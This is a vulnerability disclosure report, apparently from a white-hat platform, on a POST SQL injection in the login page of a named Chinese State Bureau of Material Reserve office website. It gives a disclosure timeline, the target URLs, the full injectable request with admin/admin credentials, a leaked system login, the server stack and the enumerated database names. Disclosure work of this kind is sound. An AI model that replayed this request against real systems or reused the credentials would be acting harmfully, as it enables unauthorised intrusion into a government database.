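2014-01-22: Details reported to the vendor; awaiting vendor handling
2014-01-27: Vendor confirmed; details disclosed to the vendor only
2014-02-06: Details disclosed to core white hats and experts in related fields
2014-02-16: Details disclosed to regular white hats
2014-02-26: Details disclosed to intern white hats
2014-03-08: Details disclosed to the public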
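A POST injection at a warehouse of one office of the State Bureau of Material Reserve
Couldn't keep my hands still. I had just tested Office 437, changed the number to 436, and that turned out to be reachable too. State Bureau of Material Reserve, Office 436: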
http://www.gc436.com.cn
Injection:
http://kjc.gc436.com.cn/ (POST)
__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTkzNzM1NDM0NmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBmludGVyMLWwne98nTjEKwz5NpE/b0pbRK2E&__EVENTVALIDATION=/wEWBAKJs7TTBgKvpuq2CALGmdGVDAK1%2Bo4qVZyggyTiLjVrcE4jf2QigyLAUvw%3D&username=admin&pwd=admin&inter0.x=60&inter0.y=11
System user: amdin/1
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: ccflow [58 tables]
Database: jggl [57 tables]
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2014-01-27 08:59
To be handled together with http:///bugs/wooyun-2014-.
None yet